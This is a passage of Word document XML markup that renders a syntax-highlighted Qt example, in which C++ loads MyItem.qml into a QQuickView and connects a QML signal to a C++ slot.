                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QQuickItem</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>*&gt;(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>v</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value</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QObject</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>*&gt;());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hyperlink r:id="rId2948" w:anchor="qDebug" w:history="1">
              <w:r w:rsidRPr="00CA76F2">
                <w:rPr>
                  <w:rStyle w:val="pln"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="FFFFFF"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qDebug</w:t>
              </w:r>
            </w:hyperlink>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&lt;&lt;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str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Item dimensions:"</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&lt;&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> item</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>width</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&lt;&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> item</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>height</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kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> main</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> argc</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lang w:val="en-US"/>
              </w:rPr>
              <w:t>char</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argv</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QApplication</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> app</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argc</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argv</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QQuickView</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> view</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QUrl</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fromLocalFile</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"MyItem.qml"</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lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QObject</w:t>
            </w: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item </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 xml:space="preserve"> view</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rootObject</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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MyClass</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> myClass</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CA76F2" w:rsidRPr="00064AC7" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:after="120"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QObject</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>::</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>connect</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>item</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SIGNAL</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>qmlSignal</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QVariant</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)),</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CA76F2" w:rsidRPr="00064AC7" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:after="120"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">                     </w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>myClass</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> SLOT</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cppSlot</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QVariant</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>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lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    view</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>show</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>();</w:t>
            </w:r>
          </w:p>
